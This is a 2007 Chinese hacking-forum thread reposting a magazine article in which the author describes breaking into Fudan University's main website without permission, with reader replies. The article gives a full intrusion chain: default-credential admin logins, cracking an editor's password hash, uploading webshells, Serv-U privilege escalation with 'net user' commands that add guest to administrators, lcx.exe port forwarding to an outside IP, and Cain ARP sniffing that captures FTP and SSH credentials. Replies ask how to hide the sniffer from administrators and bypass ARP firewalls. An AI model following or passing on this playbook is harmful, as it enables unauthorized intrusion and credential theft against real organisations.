邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]看我来入侵复旦大学 [查看完整版本]

hackest 2007-10-22 15:29

[原创]看我来入侵复旦大学

文章作者：hackest [H.S.T]
题目：看我来入侵复旦大学


此文章已发表在《黑客X档案》第6期杂志上
后经本文作者hackest友情提交到邪恶八进制论坛
如需转载，请务必保留此信息！

一、师出有名

某日十分无聊，就和X论坛的超级版主wyzhack瞎吹牛，东年西扯的。后来不知道怎么的扯到复旦去了，他提议说不如我们黑掉复旦吧。正好当时也比较清闲，就答应一起看看了，嘿嘿。这次跑去黑复旦纯粹是为了练习技术。

二、战略部署

这次要拿的是复旦主站，分站可不是我们的目标了，嘿嘿。要不然拿个分站就挂上复旦的名义似乎有点说不过去。通过google顺利找到复旦大学主站：[url]http://www.fudan.edu.cn/[/url]，如图1。
[img]http://www.hackest.cn/images/16/1.jpg[/img]
PHP的程序，打开了个链接，顺手加个单撇号，提示"警告！提交的数据非法！"，又试了几个其他的注入关键字，都被过滤掉了。看来直接从主站下手难度比较大，所以我们得想点其他办法。这里我打算利用嗅探来获取目标站的重要信息，嘿嘿。我们都知道可以根据ping一个目标地址的TTL值来大致判断对方的服务器操作系统！我ping了一下复旦主站，发现TTL值为53，如图2。
[img]http://www.hackest.cn/images/16/2.jpg[/img]
这个数值大致就是Linux的操作系统的了，嘿嘿。要想嗅探就必须要取得与目标服务器同一网段下的某台服务器权限，然后再安装嗅探工具进行嗅探攻击。复旦主站的IP为：61.129.42.5，那我们就必须在61.129.42.*这个网段里先控制一台服务器！先用SuperScan3.0扫描整个C段的21端口，作用就是先看看有没有windows操作系统的服务器在这个网段里！至于为什么要扫21嘛，大家都清楚要是装了Serv-U的话要是没什么意外，提权应该是比较容易的嘛，嘿嘿。扫描结果出来了，有好几台装有Serv-U的，按经验，装了Serv-U的就肯定是windows系统的了！IP为61.129.42.42这台明显就是windows的系统，Serv-U的版本是6.3的，如图3。
[img]http://www.hackest.cn/images/16/3.jpg[/img]

三、步步为营

现在目的很明确，就是要先控制住61.129.42.42这台服务器！在浏览器里面填入IP访问，发现页面有点难看，都是些doc文档下载的东西，对我们来说没什么用。我们可以通过查询域名绑定看看有些什么站在上面。我一般不用明小子查询，因为用它能查出来的已经很少了！用X以前介绍过的一个网站来查询吧，它查出来的比明小子查的数据要多且准！打开[url]http://www.seologs.com/ip-domains.html[/url]，在"Domain or IP address"里填上"61.129.42.42"，然后点击"submit"提交，稍等一会就会返回查询结果的了，如图4。
[img]http://www.hackest.cn/images/16/4.jpg[/img]
只有两个，似乎不容乐观哦。居然打开两个都不能访问！后来访问了一下8000端口才有反应了，如图5。
[img]http://www.hackest.cn/images/16/5.jpg[/img]
光在这里面也看不出什么来，页面比较简单，可利用的地方不多。值得庆幸的是有个"在线论坛"，打开看看，原来是动网的，嘿嘿。用默认的用户名和密码尝试登录，居然成功了进入了后台，如图6。
[img]http://www.hackest.cn/images/16/6.jpg[/img]
本以为可以很轻松的拿到webshell的，没想到这个破论坛既不能上传也不能备份！动网没了这两个功能基本上比较难拿到webshell了，郁闷！于是又上了邪恶八进制发帖讨论，没多久就在回复里面看到动网还有个后台列文件的漏洞！嘿嘿，这回似乎又有得搞了！大致方法就是在"基本设置"里修改"上传目录设定"，然后到"上传文件管理"里面去查看结果。列了N久终于发现有可利用的东西了，如图7。
[img]http://www.hackest.cn/images/16/7.jpg[/img]
ewebeditor出现了，嘿嘿。点击打开后台登录页面，如图8。
[img]http://www.hackest.cn/images/16/8.jpg[/img]
尝试默认的用户名和密码发现无法登录进去，看来密码改过了。没关系，反正我们能列文件嘛。再利用动网列文件的漏洞找到了ewebeditor的数据库文件，下载回来，用明小子的数据库管理功能打开，查看了管理员密码的MD5散列，如图9。
[img]http://www.hackest.cn/images/16/9.jpg[/img]
再到MD5查询网站查询密码，幸运的是密码并不复杂，顺利查了出来，如图10。
[img]http://www.hackest.cn/images/16/10.jpg[/img]
用得到的用户名和密码成功登录了ewebeditor的后台，如图11。
[img]http://www.hackest.cn/images/16/11.jpg[/img]
进了ewebeditor拿webshell就比较轻松的了。样式管理-拷贝样式-设置-添加允许上传类型asa，再预览上传asa后缀的ASP马，然后在"上传文件管理"里就可以看到马的了，点击直接访问webshell，如图12。
[img]http://www.hackest.cn/images/16/12.jpg[/img]
在图12里面，我们可以看到有ASPNET这个用户，一般来说很有可能支持ASPX，因为ASPX马的权限一般要比ASP的高。所以我上传了一个ASPX马。然后再传了一个SU提权的ASP马，执行："net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三条命令，意思是先激活guest用户，再给guest用户设定一个密码，再把guest用户添加进管理员组。幸运的是Serv-U的默认连接密码没有改，命令都成功执行了。在ASPX马里执行："net user guest"我们可以发现guest已经隶属于管理员组了，如图13。
[img]http://www.hackest.cn/images/16/13.jpg[/img]
用ASPX马读取了注册表的远程桌面服务端口，发现就是默认的3389，不过Terminal Services服务当时是没有开的。后来wyzhack放了鸽子才给开了，嘿嘿。

四、守株待兔

直接连接3389是行不通的，防火墙把我们挡在了外面。不过我们可以用lcx.exe给它来个端口转发。直接用ASPX马或者SU提权马发现都不能执行lcx.exe进行转发，所以我想通过修改Serv-U的配置文件来添加一个具体system权限的FTP用户，再登录上去进行端口转发。就是修改C:\Program Files\Serv-U\ServUDaemon.ini这个文件的内容啦。如何修改我就不废话了，有兴趣的话大家可以去了解下SU配置文件的存放规则，了解之后修改起来就得心应手的了。我就添加了一个用户名为hackest的，拥有system权限的FTP用户。要是配置文件没有权限修改的话，可以用SU提权马执行cacls.exe修改文件属性为everyone完全控制就可以修改的了，不过cacls.exe需要文件格式为NTFS的才可以使用哦。在CMD下登录FTP上去，执行：
C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本机执行：
lcx.exe -listen 51 2007
然后连接本机的的2007端口就可以登录远程服务器了，如图14。
[img]http://www.hackest.cn/images/16/14.jpg[/img]
到这里我们就已经成功控制了61.129.42.42这台服务器。接下来就是安装cain进行嗅探了，具体请参照我的另一篇关于嗅探入侵的文章。在61.129.42.42上执行"ipconfig /all"命令得知默认网关为61.129.42.1，如图15。
[img]http://www.hackest.cn/images/16/15.jpg[/img]
复旦主站的IP为：61.129.42.5。设置好cain就可以开始嗅探攻击了，嘿嘿。由于一开始的那几天是五一假期时间，嗅了两天一无所获。N天之后终于有进展了，wyzhack告诉我已经成功嗅探到复旦主站的FTP用户名和密码了，如图16。
[img]http://www.hackest.cn/images/16/16.jpg[/img]
对于一个网站，有了FTP密码就等于有了一切！利用FTP上传了一个PHP马，进去参观一下，如图17。
[img]http://www.hackest.cn/images/16/17.jpg[/img]

五、尘埃落定

到这里就已经完全控制了复旦大学的主站了！虽然主站的操作系统是Linux，但是我们通过先控制一台windows的3389肉鸡再进行对目标的嗅探攻击收到了如期的效果。可见嗅探攻击的威力的确非比寻常，不注意这方面的防范也必将被人恶意入侵！既然是Linux的系统，管理员一般都是用SSH来远程管理服务器的，嘿嘿。扫描一下主站服务器，发现开了22端口（SSH的默认连接端口为22）尝试用嗅到的FTP用户名和密码登录SSH居然成功了，如图18。
[img]http://www.hackest.cn/images/16/18.jpg[/img]
至于通过溢出或者其他提权方法来得到root权限，我就不弄了，因为这方面实在不太熟悉。本文主要是介绍一种入侵思路，没有什么技术含量。不得不说的一句话：管理员们要小心嗅探攻击了，嗅探的攻击力可是比较厉害的。如有不妥之处还请大家批评斧正！

hitlerboy 2007-10-24 03:25

请教一个问题，用cain嗅探的时候，你是一直挂着的么？会不会影响网段内主机的正常使用？

yerkle 2007-10-24 09:56

以前试过在自己的服务器上开CAIN，开了一晚，结果第二天机房就打电话来说我中毒了~~~~~汗~~

hackest 2007-10-24 09:59

[quote]引用第3楼hitlerboy于2007-10-24 03:25发表的 :
请教一个问题，用cain嗅探的时候，你是一直挂着的么？会不会影响网段内主机的正常使用？[/quote]
当然是一直挂着，要不管理员有可能随时登录，错过了岂不是前功尽弃？！
网络环境不太差都不太容易影响到正常使用的，不过嗅探的选项别选太多
一般选些有用的就可以了，别什么有用没用的全选，那就完了……

hitlerboy 2007-10-24 22:48

一直挂着，如果当前服务器的管理员上线，岂不是会被发现？

hackest 2007-10-24 23:03

呵呵，管理员又不是用你的用户登录的
不过占用资源太多，管理员发现很卡的话
就很容易暴露了，所以要有针对性的嗅探

飞翔star 2007-10-25 15:43

嗅探时用的cain怎么来隐藏啊
管理员登陆怎么办啊?

fhod 2007-10-25 15:59

alt+del隐藏
alt+page up呼出

hitlerboy 2007-10-25 18:29

哎，拿学校一个服务器，用这里下的cain4.8，选择了ftp，ssl，3389，然后本服务器，登陆另一个服务器的ftp，居然没嗅到，不解。
丢包0%，arp开启，嗅探到网段的主机，但是arp没效果。。。

hahashaoye 2007-10-25 19:54

嗅的多了 肯定要影响速度的 如果你只是嗅一台目标机器的话 没什么大问题

小小菜菜 2007-10-26 12:33

请问，你进3389用CAIN嗅探的时候，如果你断开3389的话CAIN程序还会继续运行吗？而且断开用户的时候在资源管理器里面还是可以看到你的用户的。

xln28118 2007-10-26 14:40

我搞的一个内网机器 网站还不少 但是一宿探那些网站就打不开 一关了又可以打开 真郁闷 。难道是网络环境不好吗？

hackest 2007-10-26 17:23

网络环境不好，再加上嗅探设置不当
就会造成网络堵塞，自然打不开网站了……
搞不好还会造成服务器死机……

梦风 2007-10-26 17:37

晕，知道了，是杂回事了，我以前也是，嗅探3389和ftp密码，嗅探半天给断了，可能就是服务器完蛋了，以后知道咯，嗅探少点就可以了，~
不过我发现有的CAIN不可靠，嗅探几天不见个东东~不知道是怎么搞的，，

snapple 2007-10-29 08:08

怎么最近看到的都是servu提权？除此之外还有没有好的提权方法？最好有大牛给我们这些小菜列举一下。不胜感激！

飞鱼8 2007-10-31 03:52

CAIN嗅探 不了解
要是能做个视频教程就好了

... 2007-10-31 06:36

[quote]引用第17楼飞鱼8于2007-10-31 03:52发表的 :
CAIN嗅探 不了解
要是能做个视频教程就好了[/quote]
玫瑰和浪子都做过教程。。google下

blacktiger 2007-11-2 02:48

*** 作者被禁止或删除 内容自动屏蔽 ***

villain251 2007-11-4 16:57

ARP太可怕了。不过现在出了ARP防火墙,N久前看到一篇文章。好象可以绕过.经亲身试验.的确可以。哎.这又是一场国内的噩梦.... [s:270] [s:270]

363402977 2007-11-6 12:51

我嗅探了半天结果光嗅探到了本机的数据，不知道怎么回事

追寻 2007-11-6 13:52

TO 楼上的没指定网卡。

音乐微草 2007-11-7 09:58

如果把木马和杀毒软件合并再改一下去入侵会怎么样呢

阿建 2007-11-19 11:57

在同一个网段监听的时候，我的工具在同一个网段的肉鸡上运行，会不会被管理发现。 不是可以通过任务管理器发现同时间登陆的其他用户没，不解。。。

wpsxy 2007-11-29 19:50

搞不懂国内怎么那么多SERV-U 如果是UNIX+Proftpd （况且Proftpd配置起来并不复杂）楼主就没那么容易了

jazzly 2008-1-8 23:41

这个嗅探对加密的FTP没用吧。我们连接服务器的FTP都是SSH加密的

chenck 2008-1-11 10:38

ServUDaemon.ini现在下载都会有密码保护地,这该怎么办啊.我是小菜,请大家多多指教.谢谢

laowan 2008-2-2 09:49

我就想问下
怎么隐藏CAIN
设置好CAIN开始嗅弹
退出3389时如果注销的话CAIN不是也关闭了?
如果不注销 >_< 管理员看到有人登录就死翘翘了
求解 [s:270]

4321 2008-2-2 10:08

[quote]引用第26楼黑冰浪子于2008-01-20 23:21发表的 没什么技术含量，运气比较好，你的思路也是唯一的路。 :
没什么技术含量，运气比较好，你的思路也是唯一的路。[/quote]


现在的入侵文章都走同一个路线,思路也就那一种,重复,重复...........看腻了,同一种方法,有啥意思?很少见创新............
喜欢lcx等牛人的文章```````

邪神 2008-2-6 01:56

好厉害　外加一个问题．

ＬＺ很厉害．　　本人是新手．　　
能帮忙解系一个问题．
[url]http://forum.eviloctal.com/thread-32135-1-1.html[/url]　　　　这个是不是确有其物？　　
如有打扰．　请原谅．！

nonceky 2008-2-20 09:52

这个思路很不错，对于用嗅探，那原本就是网络管理员应该自己先测试的，这也是他们的职责，可是很多的管理员似乎很不负责任，我记得我学校的管理员，我告诉了他很多的问题，似乎他很自负，看来入侵复旦大学的也轻松

lastgirls 2008-2-20 17:01

回复 19楼 villain251 的帖子

请问如何绕过arp防火墙?用修改过发包速度的arp软件吗？

vx7ngr 2008-3-1 10:35

看回复...cain有的研究了...嗅探不是一般的学问呵..我入侵学校域的时候嗅探了2个星期才拿到些有用的密码.

皇子 2008-3-18 15:21

不是什么大站  可以考虑用cain
流量大点 的话  
嘿嘿  估计你冒充一下网关 立马目标站打不开了

反正不建议cain

查看完整版本: [原创]看我来入侵复旦大学

© 1999-2008 EvilOctal Security Team